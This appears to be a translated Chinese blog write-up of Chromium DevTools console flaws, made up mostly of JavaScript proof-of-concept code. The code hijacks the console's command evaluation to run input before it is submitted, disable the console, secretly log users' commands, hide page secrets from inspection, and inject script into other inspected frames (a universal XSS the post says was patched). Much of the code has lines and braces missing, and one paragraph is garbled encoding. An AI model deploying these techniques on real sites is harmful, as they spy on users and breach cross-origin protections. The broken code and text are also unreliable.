- A+
0x00 引言
故事起源于 Chromium 源码里名为 InjectedScriptSource.js 的文件,这个文件负责控制台中的命令执行。也许很多人都会这么说:
【Wait!为什么是 JavaScript 在负责命令执行,Chromium/Chrome 不是用 C++编写的么?】
没错.Chromium/Chrome 的绝大部分确实不是用 javascript 编写的,但是 devtools 实际上都是一些网页。作为简单的证明,你可以尝试在浏览器里访问下面的 URL,可以看到它和console 拥有完全相同的构造。
prefix = "with ((console && console._commandLineAPI) || { __proto__: null }) {";
suffix = "}";
// *snip*
expression = prefix + "\n" + expression + "\n" + suffix;
这是个相当重要的函数,因为一些特殊的函数,比如:copy('String to Clip Board') 和 clear()都被加到了这里。然而这些函数都是类CommandLineAPI的成员。
0x01 漏洞 1
一切都将从这里变得有趣。因为我有个想法,可以把ECMAScript 5里的Getters和Setters 利用起来。因为开发者工具总是会在用户输入命令时试图给用户一些命令补全的建议。通过开发者工具的这个特点,我们就可以使用Getters和Setters来构造一个函数,实现在用户输入命令的过程当中就去执行用户的输入。这意味着在用户按下Enter之前命令就已经被执行了。
Object.defineProperty(console, '_commandLineAPI', {
get: function () {
console.log('A command was run');
0x02 简单禁用控制台访问
这里使用的思路和 FaceBook 是差不多的。
Object.defineProperty(console, '_commandLineAPI', {
get: function () {
throw 'Console Disabled';
如同你看到的,我们只要在_commandLineAPI 被检索时,抛出异常就可以简单的禁用控制台的命令执行。
0x03 引言 II
function argCounter() {
console.log('This function was run with ' + arguments.length + ' arguments.');
argCounter(); // 0
argCounter('Hello', 'World') // 2
argCounter(1, 2, 4, 8, 16, 32, 64)
var args = Array.prototype.slice.call(arguments)
// Traverse an object looking for the 'World' key value
var traverse = function(obj) {
// Loop each key
for (var index in obj) {
// If another object
if (typeof obj[index] === 'object') {
// Recursion yay!
// If matching
if (index === 'World') {
console.log('Found world: ' + obj[index]);
// Call traverse on our object
'Nested': {
'Hello': {
'World': 'Earth'
// Print the ID of the caller of this function
function call_Jim() {
// Get the calling function name without the call_Jim_as part
return 'Hi ' + arguments.callee.caller.name.substring('call_Jim_as_'.length) + '!';
// Call Jim as John
function call_Jim_as_John() {
return call_Jim();
// Call Jim as Luke
function call_Jim_as_Luke() {
return call_Jim();
// Test cases
call_Jim_as_John(); // 'Hi John!'
call_Jim_as_Luke(); // 'Hi Luke!'
0x04 漏洞 II
我们的第二个漏洞将会使用之前提到的arguments.callee.caller。当一个没有父函数的函数在standard context 中被执行时,arguments.callee.calle就会变成null。在这里有一个有趣的现象。当脚本在开发者工具的console里执行的时候,调用的函数是在本文开头说的_evaluate0n函数而并未是所期待的null。如果我们尝试着在控制台输入下面的命令,控制台就会dump出_evaluateOn函数的源代码:
(function () {
return arguments.callee.caller;
Object.defineProperty(console, '_commandLineAPI', {
get: function () {
Object.defineProperty(console, '_commandLineAPI', {
get: function () {
0: function evaluate() { [native code] }
1: InjectedScriptHost
2: "console"
3: "with ((console && console._commandLineAPI) || {}) {↵alert(1)↵}"
4: false
5: true
clearConsoleMessages - 清空控制台并删除回溯
functionDetails - 返回函数的相关细节
// Create a function with a bound this
inspect - 检查DOM对象,不会切换到inspect tab
// Inspect the body node
inspectedObject - 从DOM对象检查历史中取回对象
// Get the first inspected object
0x05 禁用控制台访问进阶篇
evalFunction: function evaluate() { [native code] }
object: InjectedScriptHost
objectGroup: 'console'
expression: 'alert(1)'
isEvalOnCallFrame: false
injectCommandLineAPI: true
var prefix = "";
var suffix = "";
if (injectCommandLineAPI && inspectedWindow.console) {
inspectedWindow.console._commandLineAPI = new CommandLineAPI(this._commandLineAPIImpl, isEvalOnCallFrame ? object : null);
prefix = "with ((console && console._commandLineAPI) || { __proto__: null }) {";
suffix = "}";
if (prefix)
expression = prefix + "\n" + expression + "\n" + suffix;
var result = evalFunction.call(object, expression);
// First run
var run = false;
// On console command run
Object.defineProperty(console, '_commandLineAPI', {
get: function () {
// Only run once
if (!run) {
run = true;
// Get the InjectedScriptHost
var InjectedScriptHost = arguments.callee.caller.arguments[1];
// On evaluate
Object.defineProperty(InjectedScriptHost, 'evaluate', {
get: function () {
// Return a alternate evaluate function
return function() {
return "The console has been disabled";
0x06 控制台日志记录
// First run
var run = false;
// Save the command line api
var _commandLineAPI = null;
// On console command run
Object.defineProperty(console, '_commandLineAPI', {
get: function () {
// Only run once
if (!run) {
run = true;
// Get the InjectedScriptHost
var InjectedScriptHost = arguments.callee.caller.arguments[1];
// On evaluate
Object.defineProperty(InjectedScriptHost, 'evaluate', {
get: function () {
// Return a alternate evaluate function
return function(command) {
// Get the commands split
var commands = command.split("\n");
// Execute the real evaluate function
var result = InjectedScriptHost.__proto__.evaluate.apply(this, arguments);
// Ignore suggustion executions for now
if (commands.length <= 1 || (result && result.name === 'getCompletions')) {
return result;
// Remove the first "with..." and last "}" lines
command = commands.slice(1, -1).join("\n");
// Next step to ignore suggustion checks
if (command.trim() === 'this') {
return result;
// Log the command and result (tries to lazily parse to a string for now)
document.write("Attempted Command:<br /><pre>" + command + "</pre>");
document.write("Command Result:<br /><pre>" + result + "</pre><hr />");
// Return the result
return result;
// Return the actual command line api
return _commandLineAPI;
set: function(value) {
// Copy the value
_commandLineAPI = value;
0x07 控制台检查
// Add our secret key and value
window.secret = 'Top secret key here';
// First run
var run = false;
// Save the command line api
var _commandLineAPI = null;
// On console command run
Object.defineProperty(console, '_commandLineAPI', {
get: function () {
// Only run once
if (!run) {
run = true;
// Get the InjectedScriptHost
var InjectedScriptHost = arguments.callee.caller.arguments[1];
// On evaluate
Object.defineProperty(InjectedScriptHost, 'evaluate', {
get: function () {
// Return a alternate evaluate function
return function(command) {
// Execute the real evaluate function
var result = InjectedScriptHost.__proto__.evaluate.apply(this, arguments);
// When the command was a attempt to access the completions
if (result && result.name === 'getCompletions') {
// Return a new completions function
return function() {
// Get the completions
var completions = result.apply(this, arguments);
// Remove the secret completion
delete completions.secret;
// Return the modified values
return completions;
// If the result is our secret value
if (result === window.secret) {
return undefined;
// Return the result
return result;
// Return the actual command line api
return _commandLineAPI;
set: function(value) {
// Copy the value
_commandLineAPI = value;
0x08 通用的跨站脚本攻击
// On console command run
Object.defineProperty(console, '_commandLineAPI', {
get: function () {
// Save a reference to the InjectedScriptHost globally
window.InjectedScriptHost = arguments.callee.caller.arguments[1];
// Get the injectedScript object
window.injectedScript = InjectedScriptHost.functionDetails(arguments.callee.caller.arguments.callee).rawScopes[0].object.injectedScript;
// Trigger another inspect (not sure why this helps but it does)
// Keep checking if an element has been inspected every 10th of a second
var check = function() {
// Hide any errors on the console to keep people unaware
try {
// Get the first inspected object
var el = injectedScript._commandLineAPIImpl._inspectedObject(1);
// Loop until no more parents
while (el.parentNode) { el = el.parentNode; }
// If the element is not the current page
if (el.URL !== window.location.href) {
// Stop checking
// Create the script element
var script = document.createElement('script');
script.type = 'text/javascript';
script.innerHTML = "alert(document.domain)";
// Add the script to the frame
} catch (e) {}
// Return the orginal evaluate function
return InjectedScriptHost.__proto__.evaluate;
就如我之前说的那样,è¿ä¸ªæ¼æ´å·²ç»è¢«yurys@chromium.org修补äºãå¦æä½ å¯¹è¿�个漏洞或者补丁感兴趣,可以点击这里here.
0x09 最后
也许你应该留意一下InjectedScriptHost.functionDetails的用法。因为它是很强大的函数。这里是个比较常见的使用例 :
// Add another scope
with ({
'test': true
}) {
var func = function() {}
// Log the details
location: {
columnNumber: 14,
lineNumber: 4,
scriptId: "1262"
name: "func",
rawScopes: [
object: {
test: true
type: 2
}, {
object: { },
type: 2
}, {
object: [object Window],
type: 3
inferredName: "InjectedScript._evaluateOn",
location: {
columnNumber: 25,
lineNumber: 591,
scriptId: "1417"
rawScopes: [
object: {
CommandLineAPI: function CommandLineAPI(commandLineAPIImpl, callFrame)
InjectedScript: function ()
InjectedScriptHost: InjectedScriptHost
Object: function Object() { [native code] }
bind: function bind(func, thisObject, var_args)
injectedScript: InjectedScript
injectedScriptId: 58
inspectedWindow: Window
slice: function slice(array, index)
toString: function toString(obj)
type: 3
}, {
object: [object Window],
type: 0
// Run via console as `listScopes();`
function listScopes() {
// Total results
var results = 0;
// Ignore these because they are cyclical
var cyclical = [
// Element that have been chacked already
var checked = [];
// Save a reference to the InjectedScriptHost globally
var InjectedScriptHost = arguments.callee.caller.arguments[1];
// Get the scope of a function
window.scope = function(func, i) {
return InjectedScriptHost.functionDetails(func).rawScopes[i].object;
// Check the scopes of an object
function checkScopes(current_name, obj) {
// Loop each key
for (var index in obj) {
// If the var has not been checked
if (checked.indexOf(obj[index]) === -1) {
var name = current_name;
if (isNaN(index)) {
name = name + '.' + index;
} else {
name = name + '[' + index + ']';
// If not cyclical
if (cyclical.indexOf(name) === -1) {
// If an array or object
if (typeof obj[index] === 'object') {
// Yay recursion
checkScopes(name, obj[index]);
if (typeof obj[index] === 'function') {
// Get the scopes
var scopes = InjectedScriptHost.functionDetails(obj[index]).rawScopes;
// Don't index our scopes function
if (obj[index] !== window.scope) {
// Loop each scope
for (var i in scopes) {
// If it's not a window
if (InjectedScriptHost.internalConstructorName(scopes[i].object) !== 'Window') {
name = 'scope(' + name + ', ' + i + ')';
// Add the path
// Recursion again
checkScopes(name, scopes[i].object);
// Check all known objects
checkScopes('window', window);
window.args = arguments.callee.caller.arguments;
checkScopes('args', args);
window.func = InjectedScriptHost.functionDetails(arguments.callee.caller).rawScopes;
checkScopes('func', func);
// Return
return "Searching finished, found " + results + " results.";
你可以通过 listScopes() 来在控制台执行它。也许还有一些BUG需要在日后解决。但是我觉得这依然是个不错的方法。
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